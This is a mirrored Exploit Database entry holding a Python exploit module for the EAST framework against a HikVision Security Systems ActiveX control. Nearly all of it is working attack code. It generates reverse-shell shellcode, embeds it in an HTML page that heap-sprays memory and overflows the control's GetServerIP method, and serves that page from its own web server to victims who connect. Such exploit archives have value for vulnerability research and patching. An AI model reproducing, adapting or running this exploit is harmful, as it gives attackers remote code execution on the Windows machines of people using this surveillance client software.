HikVision Security Systems – Activex Buffer Overflow

• Exploit Database
• 12 阅读

• 作者： Yuriy Gurkin
  日期： 2016-10-19
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/40578/

• #!/usr/bin/env python
  # The exploit is a part of EAST Framework - use only under the license agreement specified in LICENSE.txt in your EAST Framework distribution
  # visit eastfw.comeastexploits.com for more info
  import sys
  import re
  import os
  import socket
  import random
  import string
  from struct import pack
  
  sys.path.append("./core")
  from Sploit import Sploit
  sys.path.append("./shellcodes")
  from Shellcodes import OSShellcodes
  
  INFO={}
  INFO['NAME']="efa_HikVision_Security_Systems_activex"
  INFO['DESCRIPTION']="HikVision Security Systems activex Remote Overflow"
  INFO['VENDOR']="http://www.hikvision.com/us/Tools_84.html"
  INFO["CVE Name"]="0-day"
  INFO["NOTES"]="""
  Exploit-db.cominformation:
  # Exploit Title: HikVision Security Systems ActiveX exploit designed for EAST framework
  # Google Dork:none
  # Date: 19 October 2016
  # Exploit Author: EAST framework development team. Yuriy Gurkin
  # Vendor Homepage: http://www.hikvision.com/us
  # Software Link: http://www.hikvision.com/us/Tools_84.htmlclient software
  # Version: v2.5.0.5
  # Tested on: Windows XP, 7
  # CVE : 0day
  
  General information:
  Loaded File: C:\temp\WEBCAM~1\HIKVIS~1\NETVID~1.OCX
  Name:NETVIDEOACTIVEX23Lib
  Lib GUID:{99F388E9-F788-41D5-A103-8F4961539F88}
  Version: 1.0
  Lib Classes: 1
  
  Class NetVideoActiveX23
  GUID: {CAFCF48D-8E34-4490-8154-026191D73924}
  Number of Interfaces: 1
  Default Interface: _DNetVideoActiveX23
  RegKey Safe for Script: True
  RegkeySafe for Init: True
  KillBitSet: False
  """
  
  INFO['CHANGELOG']="13 Jan, 2016. Written by Gleg team."
  INFO['PATH'] = "Exploits/"
  
  PROPERTY = {}
  PROPERTY['DESCRIPTION'] = "ActiveX 0-day"
  PROPERTY['MODULE_TYPE'] = "Scada"
  
  # Must be in every module, to be set by framework
  OPTIONS = {}
  OPTIONS["CONNECTBACK_PORT"] = "8089"
  
  class exploit(Sploit):
  def __init__(self,
  port=8089, 
  logger=None):
  Sploit.__init__(self,logger=logger)
  self.port = port
  self.state = "running"
  return
  
  def args(self):
  self.args = Sploit.args(self, OPTIONS)
  self.port = int(self.args.get('CONNECTBACK_PORT', self.port))
  return
  
  def create_shellcode(self):
  self.CONNECTBACK_IP = socket.gethostbyname(socket.gethostname())
  if self.args['listener']:
  shellcode_type = 'reverse'
  port = int(self.args['listener']['PORT'])
  else:
  port = 9999
  shellcode_type = 'command'
  self.CONNECTBACK_PORT = port
  os_system = os_target = 'WINDOWS'
  os_arch = '32bit'
  s = OSShellcodes(os_target,
  os_arch,
  self.CONNECTBACK_IP,
  self.CONNECTBACK_PORT)
  s.TIMESTAMP = 'codesys'
  shellcode = s.create_shellcode(
  shellcode_type,
  encode=0,
  debug=1
  )
  return shellcode
  
  def make_data(self, shellcode):
  filedata="""
  <html>
  <object classid='clsid:CAFCF48D-8E34-4490-8154-026191D73924' id='target' ></object>
  <script type='text/javascript' language="javascript">
  ar=new Array();
  
  function spray(buffer) {
  var hope = unescape('%u9090%u9090');
  var unbuffer = unescape(buffer);
  var v= 20 + unbuffer.length;
  
  while(hope.length<v)
   hope += hope;
  
  var fk = hope.substring(0, v);
  var bk = hope.substring(0, hope.length- v );
  delete v;
  delete hope;
  
  while(bk.length+v<0x40000) { 
   bk=bk+bk+fk;
  }
  for(i=0;i<3500;i++) {
   ar[i] = bk + unbuffer;
  }
  
  }
  
  spray(<SHELLCODE>);
  
  
  buffer = "";
  for (i = 0; i < 555; i++) buffer += unescape('%u9090%u9090');
  target.GetServerIP (buffer);
  </script>
  </html>
  
  """
  if len(shellcode)%2:
  shellcode="\x90"+shellcode
  
  shell="unescape(\""
  i = 0
  while i < len(shellcode):
  shell += "%u"+"%02X%02X" %(ord(shellcode[i+1]),ord(shellcode[i])) 
  i += 2
  shell += "\")"
  filedata = filedata.replace("<SHELLCODE>", shell)
  return filedata
  
  def run(self):
  self.args()
  self.log("Generating shellcode")
  shellcode = self.create_shellcode()
  if not shellcode:
  self.log("Something goes wrong")
  return 0
  self.log("Generate Evil HTML")
  html = self.make_data(shellcode)
  self.log("Done")
  self.log("Starting web server")
  ip_server = "0.0.0.0"
  crlf = "\r\n"
  response = "HTTP/1.1 200 OK" + crlf
  response += "Content-Type: text/html" + crlf
  response += "Connection: close" + crlf
  response += "Server: Apache" + crlf
  response += "Content-Length: " + str(len(html))
  response += crlf + crlf + html + crlf
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  server = (ip_server, 8089)
  s.bind(server)
  s.listen(1)
  while True:
  try:
  connection, client_address = s.accept()
  data = connection.recv(2048)
  self.log("Got request, sending payload")
  connection.send(response)
  self.log("exploit send")
  connection.close()
  except:
  print("EXCEPT")
  self.log('All done')
  self.finish(True)
  return 1
  
  if __name__ == '__main__':
  """
  By now we only have the tool
  mode for exploit..
  Later we would have
  standalone mode also.
  """
  print "Running exploit %s .. " % INFO['NAME']
  e = exploit("192.168.0.1",80)
  e.run()